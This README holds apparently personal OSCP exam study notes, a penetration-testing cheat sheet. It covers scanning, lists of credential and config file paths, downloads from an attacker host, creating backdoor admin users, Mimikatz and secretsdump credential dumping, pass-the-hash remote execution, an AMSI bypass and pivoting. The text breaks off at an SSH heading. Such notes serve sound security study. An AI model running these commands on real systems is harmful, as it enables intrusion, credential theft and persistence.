└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # OSCP-Notes 2 | 3 | **Preparing as part of my OSCP Certificate.** 4 | 5 | # General 6 | # OSCP Commands 7 | 8 | > Quick commands and Mods to make Pentesting easy. 9 | 10 | --- 11 | 12 | ## Quick setup 13 | 14 | 15 | #### Exports 16 | 17 | 18 | ``` 19 | export USER="" 20 | export PASSWORD="" 21 | export LHOST="" 22 | export LPORT="" 23 | ``` 24 | 25 | #### Aliases suggestion 26 | 27 | 28 | ``` 29 | alias offsecvpn="sudo openvpn /home/sathvik/OSCP/offsecvpn.ovpn" 30 | alias httpserver="python3 -m http.server 8000" 31 | alias ll="ls -alF" 32 | alias build="mkdir files exploits && touch hashes users passwords" 33 | alias powerenc="python3 /home/sathvik/Tools/power-reverseshell.py" 34 | alias getexploit="searchsploit -m" 35 | alias nmapautomator="bash /opt/nmapautomator.sh" 36 | alias gobuster="gobuster dir -u $URL -w /usr/share/wordlists/dirb/common.txt" 37 | alias nikto="nikto -h $URL" 38 | alias smbclient="smbclient -L //$IP" 39 | alias hydra="hydra -L users.txt -P passwords.txt $IP -t 4 ssh" 40 | alias dirsearch="python3 /opt/dirsearch/dirsearch.py -u $URL -e php,html" 41 | alias nc="nc -lvnp $LPORT" 42 | alias msfconsole="msfconsole -q" 43 | alias curlx="curl -X GET $URL" 44 | alias pyserv="python3 -m http.server $LPORT" 45 | alias sshkeygen="ssh-keygen -t rsa -b 4096" 46 | alias exiftool="exiftool" 47 | alias john="john --wordlist=rockyou.txt" 48 | alias sqlmap="sqlmap -u $URL --batch --random-agent" 49 | alias wget="wget -r -np -R 'index.html*'" 50 | 51 | ``` 52 | 53 | #### Scanning 54 | 55 | 56 | 1. Nmap TCP scan over 65535 ports 57 | 58 | ``` 59 | sudo nmap -T4 -sC -sV -p- $IP --open -oN nmap-tcp.txt -v 60 | ``` 61 | 62 | 2. Nmap UDP scan over top ports 63 | 64 | ``` 65 | sudo nmap -sU --top-ports 20 $IP -oN nmap-udp-top.txt --open -v 66 | ``` 67 | 68 | ## Important Locations 69 | 70 | >💡 For Finding all important files in Windows:(CTF Style) 71 | `cd c:\Users` then 72 | `tree /F` 73 | 74 |
75 | Windows 76 | 77 | C:/Users/Administrator/NTUser.dat # Registry settings 78 | C:/Documents and Settings/Administrator/NTUser.dat # Registry settings 79 | C:/apache/logs/access.log # Apache access logs 80 | C:/apache/logs/error.log # Apache error logs 81 | C:/apache/php/php.ini # PHP configuration 82 | C:/boot.ini # Boot configuration 83 | C:/inetpub/wwwroot/global.asa # IIS global script 84 | C:/MySQL/data/hostname.err # MySQL error log 85 | C:/MySQL/data/mysql.err # MySQL error log 86 | C:/MySQL/data/mysql.log # MySQL general log 87 | C:/MySQL/my.cnf # MySQL configuration 88 | C:/MySQL/my.ini # MySQL configuration 89 | C:/php4/php.ini # PHP configuration 90 | C:/php5/php.ini # PHP configuration 91 | C:/php/php.ini # PHP configuration 92 | C:/Program Files/Apache Group/Apache2/conf/httpd.conf # Apache configuration 93 | C:/Program Files/Apache Group/Apache/conf/httpd.conf # Apache configuration 94 | C:/Program Files/Apache Group/Apache/logs/access.log # Apache access logs 95 | C:/Program Files/Apache Group/Apache/logs/error.log # Apache error logs 96 | C:/Program Files/FileZilla Server/FileZilla Server.xml # FTP server config 97 | C:/Program Files/MySQL/data/hostname.err # MySQL error log 98 | C:/Program Files/MySQL/data/mysql-bin.log # MySQL binary log 99 | C:/Program Files/MySQL/data/mysql.err # MySQL error log 100 | C:/Program Files/MySQL/data/mysql.log # MySQL general log 101 | C:/Program Files/MySQL/my.ini # MySQL configuration 102 | C:/Program Files/MySQL/my.cnf # MySQL configuration 103 | C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err # MySQL error log 104 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log # MySQL binary log 105 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err # MySQL error log 106 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log # MySQL general log 107 | C:/Program Files/MySQL/MySQL Server 5.0/my.cnf # MySQL configuration 108 | C:/Program Files/MySQL/MySQL Server 5.0/my.ini # MySQL configuration 109 | C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf # Apache configuration 110 | C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf # Apache configuration 111 | C:/Program Files (x86)/Apache Group/Apache/conf/access.log # Apache access logs 112 | C:/Program Files (x86)/Apache Group/Apache/conf/error.log # Apache error logs 113 | C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml # FTP server config 114 | C:/Program Files (x86)/xampp/apache/conf/httpd.conf # Apache configuration 115 | C:/WINDOWS/php.ini # PHP configuration 116 | C:/WINDOWS/Repair/SAM # Backup SAM database 117 | C:/Windows/repair/system # Backup system hive 118 | C:/Windows/repair/software # Backup software hive 119 | C:/Windows/repair/security # Backup security hive 120 | C:/WINDOWS/System32/drivers/etc/hosts # Hosts file 121 | C:/Windows/win.ini # Windows initialization 122 | C:/WINNT/php.ini # PHP configuration 123 | C:/WINNT/win.ini # Windows initialization 124 | C:/xampp/apache/bin/php.ini # PHP configuration 125 | C:/xampp/apache/logs/access.log # Apache access logs 126 | C:/xampp/apache/logs/error.log # Apache error logs 127 | C:/Windows/Panther/Unattend/Unattended.xml # Windows setup file 128 | C:/Windows/Panther/Unattended.xml # Windows setup file 129 | C:/Windows/debug/NetSetup.log # Network setup log 130 | C:/Windows/system32/config/AppEvent.Evt # Application event log 131 | C:/Windows/system32/config/SecEvent.Evt # Security event log 132 | C:/Windows/system32/config/default.sav # Registry backup 133 | C:/Windows/system32/config/security.sav # Registry backup 134 | C:/Windows/system32/config/software.sav # Registry backup 135 | C:/Windows/system32/config/system.sav # Registry backup 136 | C:/Windows/system32/config/regback/default # Registry backup 137 | C:/Windows/system32/config/regback/sam # Registry backup 138 | C:/Windows/system32/config/regback/security # Registry backup 139 | C:/Windows/system32/config/regback/system # Registry backup 140 | C:/Windows/system32/config/regback/software # Registry backup 141 | C:/Program Files/MySQL/MySQL Server 5.1/my.ini # MySQL configuration 142 | C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml # ASP.NET schema 143 | C:/Windows/System32/inetsrv/config/applicationHost.config # IIS configuration 144 | C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log # IIS log files 145 |
146 | 147 |
148 | Linux 149 | 150 | /etc/passwd # User accounts 151 | /etc/shadow # Password hashes 152 | /etc/aliases # Email aliases 153 | /etc/anacrontab # Cron jobs 154 | /etc/apache2/apache2.conf # Apache configuration 155 | /etc/apache2/httpd.conf # Apache configuration 156 | /etc/apache2/sites-enabled/000-default.conf # Apache virtual host 157 | /etc/at.allow # Allowed at users 158 | /etc/at.deny # Denied at users 159 | /etc/bashrc # Bash shell initialization 160 | /etc/bootptab # BOOTP server configuration 161 | /etc/chrootUsers # Chroot users 162 | /etc/chttp.conf # CHTTP server configuration 163 | /etc/cron.allow # Allowed cron users 164 | /etc/cron.deny # Denied cron users 165 | /etc/crontab # Cron jobs 166 | /etc/cups/cupsd.conf # CUPS configuration 167 | /etc/exports # NFS shares 168 | /etc/fstab # Filesystems mount 169 | /etc/ftpaccess # FTP server access 170 | /etc/ftpchroot # FTP chroot users 171 | /etc/ftphosts # FTP host access 172 | /etc/groups # Group accounts 173 | /etc/grub.conf # Bootloader configuration 174 | /etc/hosts # Hostname to IP 175 | /etc/hosts.allow # Allowed hosts 176 | /etc/hosts.deny # Denied hosts 177 | /etc/httpd/access.conf # Apache access config 178 | /etc/httpd/conf/httpd.conf # Apache configuration 179 | /etc/httpd/httpd.conf # Apache configuration 180 | /etc/httpd/logs/access_log # Apache access logs 181 | /etc/httpd/logs/access.log # Apache access logs 182 | /etc/httpd/logs/error_log # Apache error logs 183 | /etc/httpd/logs/error.log # Apache error logs 184 | /etc/httpd/php.ini # PHP configuration 185 | /etc/httpd/srm.conf # Apache srm config 186 | /etc/inetd.conf # Inetd service configuration 187 | /etc/inittab # System initialization 188 | /etc/issue # Pre-login message 189 | /etc/knockd.conf # Knockd configuration 190 | /etc/lighttpd.conf # Lighttpd configuration 191 | /etc/lilo.conf # LILO bootloader config 192 | /etc/logrotate.d/ftp # Logrotate FTP logs 193 | /etc/logrotate.d/proftpd # Logrotate ProFTPD logs 194 | /etc/logrotate.d/vsftpd.log # Logrotate vsftpd logs 195 | /etc/lsb-release # Distro info 196 | /etc/motd # Message of the day 197 | /etc/modules.conf # Kernel modules 198 | /etc/motd # Message of the day 199 | /etc/mtab # Mounted filesystems 200 | /etc/my.cnf # MySQL configuration 201 | /etc/my.conf # MySQL configuration 202 | /etc/mysql/my.cnf # MySQL configuration 203 | /etc/network/interfaces # Network configuration 204 | /etc/networks # Network names 205 | /etc/npasswd # Password file 206 | /etc/php4.4/fcgi/php.ini # PHP configuration 207 | /etc/php4/apache2/php.ini # PHP configuration 208 | /etc/php4/apache/php.ini # PHP configuration 209 | /etc/php4/cgi/php.ini # PHP configuration 210 | /etc/php5/apache2/php.ini # PHP configuration 211 | /etc/php5/apache/php.ini # PHP configuration 212 | /etc/php/apache2/php.ini # PHP configuration 213 | /etc/php/apache/php.ini # PHP configuration 214 | /etc/php/cgi/php.ini # PHP configuration 215 | /etc/php.ini # PHP configuration 216 | /etc/php/php4/php.ini # PHP configuration 217 | /etc/php/php.ini # PHP configuration 218 | /etc/printcap # Printer capabilities 219 | /etc/profile # System-wide shell profile 220 | /etc/proftp.conf # ProFTPd configuration 221 | /etc/proftpd/proftpd.conf # ProFTPd configuration 222 | /etc/pure-ftpd.conf # Pure-FTPD configuration 223 | /etc/pureftpd.passwd # Pure-FTPD password file 224 | /etc/pureftpd.pdb # Pure-FTPD user database 225 | /etc/pure-ftpd/pure-ftpd.conf # Pure-FTPD configuration 226 | /etc/pure-ftpd/pure-ftpd.pdb # Pure-FTPD database 227 | /etc/pure-ftpd/putreftpd.pdb # Pure-FTPD database 228 | /etc/redhat-release # RedHat version info 229 | /etc/resolv.conf # DNS servers 230 | /etc/samba/smb.conf # Samba configuration 231 | /etc/snmpd.conf # SNMP daemon config 232 | /etc/ssh/ssh_config # SSH client config 233 | /etc/ssh/sshd_config # SSH server config 234 | /etc/ssh/ssh_host_dsa_key # SSH host key 235 | /etc/ssh/ssh_host_dsa_key.pub # SSH host key 236 | /etc/ssh/ssh_host_key # SSH host key 237 | /etc/ssh/ssh_host_key.pub # SSH host key 238 | /etc/sysconfig/network # Network settings 239 | /etc/syslog.conf # Syslog configuration 240 | /etc/termcap # Terminal capabilities 241 | /etc/vhcs2/proftpd/proftpd.conf # VHCS2 ProFTPd config 242 | /etc/vsftpd.chroot_list # VsFTPd chroot list 243 | /etc/vsftpd.conf # VsFTPd configuration 244 | /etc/vsftpd/vsftpd.conf # VsFTPd configuration 245 | /etc/wu-ftpd/ftpaccess # WuFTP access control 246 | /etc/wu-ftpd/ftphosts # WuFTP hosts 247 | /etc/wu-ftpd/ftpusers # WuFTP users 248 | /logs/pure-ftpd.log # Pure-FTPD logs 249 | /logs/security_debug_log # Security logs 250 | /logs/security_log # Security logs 251 | /opt/lampp/etc/httpd.conf # XAMPP Apache config 252 | /opt/xampp/etc/php.ini # XAMPP PHP config 253 | /proc/cmdline # Boot command line 254 | /proc/cpuinfo # CPU information 255 | /proc/filesystems # Filesystems supported 256 | /proc/interrupts # Interrupts info 257 | /proc/ioports # I/O port info 258 | /proc/meminfo # Memory info 259 | /proc/modules # Loaded kernel modules 260 | /proc/mounts # Mounted filesystems 261 | /proc/net/arp # ARP table 262 | /proc/net/tcp # TCP connections 263 | /proc/net/udp # UDP connections 264 | /proc//cmdline # Process command line 265 | /proc//maps # Process memory maps 266 | /proc/sched_debug # Scheduler debug info 267 | /proc/self/cwd/app.py # Current working directory app 268 | /proc/self/environ # Process environment 269 | /proc/self/net/arp # ARP table 270 | /proc/stat # System statistics 271 | /proc/swaps # Swap information 272 | /proc/version # Kernel version 273 | /root/anaconda-ks.cfg # Kickstart configuration 274 | /usr/etc/pure-ftpd.conf # Pure-FTPD configuration 275 | /usr/lib/php.ini # PHP configuration 276 | /usr/lib/php/php.ini # PHP configuration 277 | /usr/local/apache/conf/modsec.conf # ModSecurity config 278 | /usr/local/apache/conf/php.ini # PHP configuration 279 | /usr/local/apache/log # Apache logs 280 | /usr/local/apache/logs # Apache logs 281 | /usr/local/apache/logs/access_log # Apache access logs 282 | /usr/local/apache/logs/access.log # Apache access logs 283 | /usr/local/apache/audit_log # Apache audit logs 284 | /usr/local/apache/error_log # Apache error logs 285 | /usr/local/apache/error.log # Apache error logs 286 | /usr/local/cpanel/logs # cPanel logs 287 | /usr/local/cpanel/logs/access_log # cPanel access logs 288 | /usr/local/cpanel/logs/error_log # cPanel error logs 289 | /usr/local/cpanel/logs/license_log # cPanel license logs 290 | /usr/local/cpanel/logs/login_log # cPanel login logs 291 | /usr/local/cpanel/logs/stats_log # cPanel stats logs 292 | /usr/local/etc/httpd/logs/access_log # HTTPD access logs 293 | /usr/local/etc/httpd/logs/error_log # HTTPD error logs 294 | /usr/local/etc/php.ini # PHP configuration 295 | /usr/local/etc/pure-ftpd.conf # Pure-FTPD configuration 296 | /usr/local/etc/pureftpd.pdb # Pure-FTPD database 297 | /usr/local/lib/php.ini # PHP configuration 298 | /usr/local/php4/httpd.conf # PHP4 HTTPD config 299 | /usr/local/php4/httpd.conf.php # PHP4 HTTPD PHP config 300 | /usr/local/php4/lib/php.ini # PHP4 configuration 301 | /usr/local/php5/httpd.conf # PHP5 HTTPD config 302 | /usr/local/php5/httpd.conf.php # PHP5 HTTPD PHP config 303 | /usr/local/php5/lib/php.ini # PHP5 configuration 304 | /usr/local/php/httpd.conf # PHP HTTPD config 305 | /usr/local/php/httpd.conf.ini # PHP HTTPD ini config 306 | /usr/local/php/lib/php.ini # PHP configuration 307 | /usr/local/pureftpd/etc/pure-ftpd.conf # Pure-FTPD configuration 308 | /usr/local/pureftpd/etc/pureftpd.pdn # Pure-FTPD database 309 | /usr/local/pureftpd/sbin/pure-config.pl # Pure-FTPD script 310 | /usr/local/www/logs/httpd_log # HTTPD logs 311 | /usr/local/Zend/etc/php.ini # Zend PHP configuration 312 | /usr/sbin/pure-config.pl # Pure-FTPD script 313 | /var/adm/log/xferlog # Transfer logs 314 | /var/apache2/config.inc # Apache2 configuration 315 | /var/apache/logs/access_log # Apache access logs 316 | /var/apache/logs/error_log # Apache error logs 317 | /var/cpanel/cpanel.config # cPanel configuration 318 | /var/lib/mysql/my.cnf # MySQL configuration 319 | /var/lib/mysql/mysql/user.MYD # MySQL user data 320 | /var/local/www/conf/php.ini # PHP configuration 321 | /var/log/apache2/access_log # Apache access logs 322 | /var/log/apache2/access.log # Apache access logs 323 | /var/log/apache2/error_log # Apache error logs 324 | /var/log/apache2/error.log # Apache error logs 325 | /var/log/apache/access_log # Apache access logs 326 | /var/log/apache/access.log # Apache access logs 327 | /var/log/apache/error_log # Apache error logs 328 | /var/log/apache/error.log # Apache error logs 329 | /var/log/apache-ssl/access.log # SSL access logs 330 | /var/log/apache-ssl/error.log # SSL error logs 331 | /var/log/auth.log # Authentication logs 332 | /var/log/boot # Boot logs 333 | /var/htmp # Temporary files 334 | /var/log/chttp.log # CHTTP logs 335 | /var/log/cups/error.log # CUPS error logs 336 | /var/log/daemon.log # Daemon logs 337 | /var/log/debug # Debug logs 338 | /var/log/dmesg # Boot messages 339 | /var/log/dpkg.log # Package manager logs 340 | /var/log/exim_mainlog # Exim main logs 341 | /var/log/exim/mainlog # Exim main logs 342 | /var/log/exim_paniclog # Exim panic logs 343 | /var/log/exim.paniclog # Exim panic logs 344 | /var/log/exim_rejectlog # Exim reject logs 345 | /var/log/exim/rejectlog # Exim reject logs 346 | /var/log/faillog # Failed login attempts 347 | /var/log/ftplog # FTP logs 348 | /var/log/ftp-proxy # FTP proxy logs 349 | /var/log/ftp-proxy/ftp-proxy.log # FTP proxy logs 350 | /var/log/httpd-access.log # HTTPD access logs 351 | /var/log/httpd/access_log # HTTPD access logs 352 | /var/log/httpd/access.log # HTTPD access logs 353 | /var/log/httpd/error_log # HTTPD error logs 354 | /var/log/httpd/error.log # HTTPD error logs 355 | /var/log/httpsd/ssl.access_log # SSL access logs 356 | /var/log/httpsd/ssl_log # SSL logs 357 | /var/log/kern.log # Kernel logs 358 | /var/log/lastlog # Last login logs 359 | /var/log/lighttpd/access.log # Lighttpd access logs 360 | /var/log/lighttpd/error.log # Lighttpd error logs 361 | /var/log/lighttpd/lighttpd.access.log # Lighttpd access logs 362 | /var/log/lighttpd/lighttpd.error.log # Lighttpd error logs 363 | /var/log/mail.info # Mail information 364 | /var/log/mail.log # Mail logs 365 | /var/log/maillog # Mail logs 366 | /var/log/mail.warn # Mail warnings 367 | /var/log/message # System messages 368 | /var/log/messages # System messages 369 | /var/log/mysqlderror.log # MySQL error log 370 | /var/log/mysql.log # MySQL logs 371 | /var/log/mysql/mysql-bin.log # MySQL binary log 372 | /var/log/mysql/mysql.log # MySQL logs 373 | /var/log/mysql/mysql-slow.log # MySQL slow query log 374 | /var/log/proftpd # ProFTPd logs 375 | /var/log/pureftpd.log # Pure-FTPD logs 376 | /var/log/pure-ftpd/pure-ftpd.log # Pure-FTPD logs 377 | /var/log/secure # Security logs 378 | /var/log/vsftpd.log # VsFTPd logs 379 | /var/log/wtmp # Login records 380 | /var/log/xferlog # Transfer logs 381 | /var/log/yum.log # Yum package manager logs 382 | /var/mysql.log # MySQL logs 383 | /var/run/utmp # Current logins 384 | /var/spool/cron/crontabs/root # Root crontab 385 | /var/webmin/miniserv.log # Webmin logs 386 | /var/www/html/__init__.py # Python init file 387 | /var/www/html/db_connect.php # PHP database connection 388 | /var/www/html/utils.php # PHP utility file 389 | /var/www/log/access_log # Web access logs 390 | /var/www/log/error_log # Web error logs 391 | /var/www/logs/access_log # Web access logs 392 | /var/www/logs/error_log # Web error logs 393 | /var/www/logs/access.log # Web access logs 394 | /var/www/logs/error.log # Web error logs 395 | ~/.atfp_history # ATFP history 396 | ~/.bash_history # Bash shell history 397 | ~/.bash_logout # Bash logout file 398 | ~/.bash_profile # Bash profile 399 | ~/.bashrc # Bash shell initialization 400 | ~/.gtkrc # GTK settings 401 | ~/.login # Shell login script 402 | ~/.logout # Shell logout script 403 | ~/.mysql_history # MySQL history 404 | ~/.nano_history # Nano editor history 405 | ~/.php_history # PHP shell history 406 | ~/.profile # User profile script 407 | ~/.ssh/authorized_keys # SSH authorized keys 408 | ~/.ssh/id_dsa # DSA SSH key 409 | ~/.ssh/id_dsa.pub # DSA SSH public key 410 | ~/.ssh/id_rsa # RSA SSH key 411 | ~/.ssh/id_edcsa # ECDSA SSH key 412 | ~/.ssh/id_rsa.pub # RSA SSH public key 413 | ~/.ssh/identity # SSH identity key 414 | ~/.ssh/identity.pub # SSH public key 415 | ~/.viminfo # Vim editor history 416 | ~/.wm_style # Window manager style 417 | ~/.Xdefaults # X Window settings 418 | ~/.xinitrc # X Window init script 419 | ~/.Xresources # X Window resources 420 | ~/.xsession # X Window session script 421 |
422 | 423 | **Discovering KDBX files** 424 | 1. In Windows 425 | ```powershell 426 | Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue 427 | ``` 428 | 2. In Linux 429 | ```bash 430 | find / -name *.kdbx 2>/dev/null 431 | ``` 432 | 433 | ### GitHub recon 434 | 435 | - You need to find traces of the `.git` files on the target machine. 436 | - Now navigate to the directory where the file is located, a potential repository. 437 | - Commands 438 | 439 | ```jsx 440 | # Log information of the current repository. 441 | git log 442 | 443 | # This will display the log of the stuff happened, like commit history which is very useful 444 | git show 445 | 446 | # This shows the commit information and the newly added stuff. 447 | ``` 448 | 449 | - If you identify `.git` active on the website. Use https://github.com/arthaud/git-dumper now it downloads all the files and saves it locally. Perform the same above commands and escalate. 450 | - Some useful GitHub dorks: [https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets](https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets) → this might not be relevant to the exam environment. 451 | 452 | ## Connecting to RDP 453 | 454 | ```bash 455 | xfreerdp /u:uname /p:'pass' /v:IP 456 | xfreerdp /d:domain.com /u:uname /p:'pass' /v:IP 457 | xfreerdp /u:uname /p:'pass' /v:IP +clipboard #try this option if normal login doesn't work 458 | ``` 459 | 460 | ## Adding SSH Public key 461 | 462 | - This can be used to get ssh session, on target machine which is based on linux 463 | 464 | ```jsx 465 | ssh-keygen -t rsa -b 4096 #give any password 466 | 467 | #This created both id_rsa and id_rsa.pub in ~/.ssh directory 468 | #Copy the content in "id_rsa.pub" and create ".ssh" directory in /home of target machine. 469 | chmod 700 ~/.ssh 470 | nano ~/.ssh/authorized_keys #enter the copied content here 471 | chmod 600 ~/.ssh/authorized_keys 472 | 473 | #On Attacker machine 474 | ssh username@target_ip #enter password if you gave any 475 | ``` 476 | 477 | ## File Transfers 478 | 479 | - Netcat 480 | 481 | ```bash 482 | #Attacker 483 | nc 1234 < nmap 484 | 485 | #Target 486 | nc -lvp 1234 > nmap 487 | ``` 488 | 489 | - Downloading on Windows 490 | 491 | ```powershell 492 | powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\ 493 | iwr -uri http://lhost/file -Outfile file 494 | certutil -urlcache -split -f "http:///" 495 | copy \\kali\share\file . 496 | ``` 497 | 498 | - Downloading on Linux 499 | 500 | ```powershell 501 | wget http://lhost/file 502 | curl http:/// > 503 | ``` 504 | 505 | ### Windows to Kali 506 | 507 | ```powershell 508 | kali> impacket-smbserver -smb2support . 509 | win> copy file \\KaliIP\sharename 510 | ``` 511 | 512 | ## Adding Users 513 | 514 | ### Windows 515 | 516 | ```powershell 517 | net user hacker hacker123 /add 518 | net localgroup Administrators hacker /add 519 | net localgroup "Remote Desktop Users" hacker /ADD 520 | ``` 521 | 522 | ### Linux 523 | 524 | ```powershell 525 | adduser #Interactive 526 | useradd 527 | 528 | useradd -u -g #UID can be something new than existing, this command is to add a user to a specific group 529 | ``` 530 | 531 | ## Password-Hash Cracking 532 | 533 | *Hash Analyzer*: [https://www.tunnelsup.com/hash-analyzer/](https://www.tunnelsup.com/hash-analyzer/)
534 | ## Password file saw in offsec discord 500-worst-passwords.txt 535 | ### Hash Identifier 536 | - Identify the hash types using these tools 537 | ```powershell 538 | hashid 539 | name-that-hash -f 540 | ``` 541 | ### fcrackzip 542 | 543 | ```powershell 544 | fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt .zip #Cracking zip files 545 | ``` 546 | 547 | ### John 548 | 549 | > [https://github.com/openwall/john/tree/bleeding-jumbo/run](https://github.com/openwall/john/tree/bleeding-jumbo/run) 550 | > 551 | - If there’s an encrypted file, try to convert it into john hash and crack. 552 | 553 | ```powershell 554 | ssh2john.py id_rsa > hash 555 | #Convert the obtained hash to John format(above link) 556 | john hashfile --wordlist=rockyou.txt 557 | ``` 558 | ### keepass2John 559 | During the Initial enumeration process of the target with smbclient -L //target or smbclient -L ////target found Database.kdbx file in User directory. 560 | ```powershell 561 | keepass2john Database.kdbx > keepass.hash 562 | john keepass.hash 563 | or 564 | hashcat --help | grep "KeePass" 565 | hashcat -m 13400 keepass.hash /home/kali/HTB/OSCP/rockyou.txt 566 | ``` 567 | 568 | 569 | ### Hashcat 570 | 571 | > [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) 572 | > 573 | 574 | ```powershell 575 | #Obtain the Hash module number 576 | hashcat -m hash wordlists.txt --force 577 | ``` 578 | 579 | ## Pivoting through SSH 580 | 581 | ```bash 582 | ssh adminuser@10.10.155.5 -i id_rsa -D 9050 #TOR port 583 | 584 | #Change the info in /etc/proxychains4.conf also enable "Quiet Mode" 585 | 586 | proxychains4 crackmapexec smb 10.10.10.0/24 #Example 587 | ``` 588 | 589 | ## Dealing with Passwords 590 | 591 | - When there’s a scope for bruteforce or hash-cracking then try the following, 592 | - Have a valid usernames first 593 | - Dont firget trying `admin:admin` 594 | - Try `username:username` as first credential 595 | - If it’s related to a service, try default passwords. 596 | - Service name as the username as well as the same name for password. 597 | - Use Rockyou.txt 598 | - Some default passwords to always try out! 599 | 600 | ```jsx 601 | password 602 | password1 603 | Password1 604 | Password@123 605 | password@123 606 | admin 607 | administrator 608 | admin@123 609 | 610 | ``` 611 | 612 | ## Impacket 613 | 614 | ```bash 615 | smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address] #we connect to the server rather than a share 616 | 617 | lookupsid.py [domain]/[user]:[password/password hash]@[Target IP Address] #User enumeration on target 618 | 619 | services.py [domain]/[user]:[Password/Password Hash]@[Target IP Address] [Action] #service enumeration 620 | 621 | secretsdump.py [domain]/[user]:[password/password hash]@[Target IP Address] #Dumping hashes on target 622 | 623 | GetUserSPNs.py [domain]/[user]:[password/password hash]@[Target IP Address] -dc-ip -request #Kerberoasting, and request option dumps TGS 624 | 625 | GetNPUsers.py test.local/ -dc-ip -usersfile usernames.txt -format hashcat -outputfile hashes.txt #Asreproasting, need to provide usernames list 626 | 627 | ##RCE 628 | psexec.py test.local/john:password123@10.10.10.1 629 | psexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 630 | 631 | wmiexec.py test.local/john:password123@10.10.10.1 632 | wmiexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 633 | 634 | smbexec.py test.local/john:password123@10.10.10.1 635 | smbexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 636 | 637 | atexec.py test.local/john:password123@10.10.10.1 638 | atexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 639 | 640 | ``` 641 | 642 | ## Evil-Winrm 643 | 644 | ```bash 645 | ##winrm service discovery 646 | nmap -p5985,5986 647 | 5985 - plaintext protocol 648 | 5986 - encrypted 649 | 650 | ##Login with password 651 | evil-winrm -i -u user -p pass 652 | evil-winrm -i -u user -p pass -S #if 5986 port is open 653 | 654 | ##Login with Hash 655 | evil-winrm -i -u user -H ntlmhash 656 | 657 | ##Login with key 658 | evil-winrm -i -c certificate.pem -k priv-key.pem -S #-c for public key and -k for private key 659 | 660 | ##Logs 661 | evil-winrm -i -u user -p pass -l 662 | 663 | ##File upload and download 664 | upload 665 | download #not required to provide path all time 666 | 667 | ##Loading files direclty from Kali location 668 | evil-winrm -i -u user -p pass -s /opt/privsc/powershell #Location can be different 669 | Bypass-4MSI 670 | Invoke-Mimikatz.ps1 671 | Invoke-Mimikatz 672 | 673 | ##evil-winrm commands 674 | menu # to view commands 675 | #There are several commands to run 676 | #This is an example for running a binary 677 | evil-winrm -i -u user -p pass -e /opt/privsc 678 | Bypass-4MSI 679 | menu 680 | Invoke-Binary /opt/privsc/winPEASx64.exe 681 | ``` 682 | 683 | ## Mimikatz 684 | 685 | ```powershell 686 | privilege::debug 687 | 688 | token::elevate 689 | 690 | sekurlsa::logonpasswords #hashes and plaintext passwords 691 | lsadump::sam 692 | lsadump::sam SystemBkup.hiv SamBkup.hiv 693 | lsadump::dcsync /user:krbtgt 694 | lsadump::lsa /patch #both these dump SAM 695 | 696 | #OneLiner 697 | .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" 698 | 699 | ``` 700 | 701 | ## Ligolo-ng 702 | 703 | ```powershell 704 | #Creating interface and starting it. 705 | sudo ip tuntap add user $(whoami) mode tun ligolo 706 | sudo ip link set ligolo up 707 | 708 | #Kali machine - Attacker machine 709 | ./proxy -laddr 0.0.0.0:9001 -selfcert 710 | 711 | #windows or linux machine - compromised machine 712 | agent.exe -connect :9001 -ignore-cert 713 | 714 | #In Ligolo-ng console 715 | session #select host 716 | ifconfig #Notedown the internal network's subnet 717 | start #after adding relevent subnet to ligolo interface 718 | 719 | #Adding subnet to ligolo interface - Kali linux 720 | sudo ip r add dev ligolo 721 | 722 | ``` 723 | 724 | --- 725 | 726 | # Recon and Enumeration 727 | 728 | - OSINT OR Passive Recon 729 | 730 | 734 | 735 | - whois: `whois ` or `whois -h ` 736 | - Google dorking, 737 | - site 738 | - filetype 739 | - intitle 740 | - GHDB - Google hacking database 741 | - OS and Service Information using [searchdns.netcraft.com](http://searchdns.netcraft.com) 742 | - Github dorking 743 | - filename 744 | - user 745 | - A tool called Gitleaks for automated enumeration 746 | - Shodan dorks 747 | - hostname 748 | - port 749 | - Then gather infor by going through the options 750 | - Scanning Security headers and SSL/TLS using [https://securityheaders.com/](https://securityheaders.com/) 751 | 752 | 753 | ## Port Scanning 754 | 755 | ```powershell 756 | #use -Pn option if you're getting nothing in scan 757 | nmap -sC -sV -v #Basic scan 758 | nmap -T4 -A -p- -v #complete scan 759 | sudo nmap -sV -p 443 --script "vuln" 192.168.50.124 #running vuln category scripts 760 | 761 | #NSE 762 | updatedb 763 | locate .nse | grep 764 | sudo nmap --script="name" #here we can specify other options like specific ports...etc 765 | 766 | Test-NetConnection -Port #powershell utility 767 | 768 | 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null #automating port scan of first 1024 ports in powershell 769 | ``` 770 | 771 | ## FTP enumeration 772 | 773 | ```powershell 774 | ftp 775 | #login if you have relevant creds or based on nmpa scan find out whether this has anonymous login or not, then loginwith anonymous:password 776 | 777 | put #uploading file 778 | get #downloading file 779 | 780 | #NSE 781 | locate .nse | grep ftp 782 | nmap -p21 --script= 783 | 784 | #bruteforce 785 | hydra -L users.txt -P passwords.txt ftp #'-L' for usernames list, '-l' for username and vice-versa 786 | hydra -l offsec -P /usr/share/seclists/Passwords/500-worst-passwords.txt ftp 787 | 788 | #check for vulnerabilities associated with the version identified. 789 | ``` 790 | 791 | ## SSH enumeration 792 | 793 | ```powershell 794 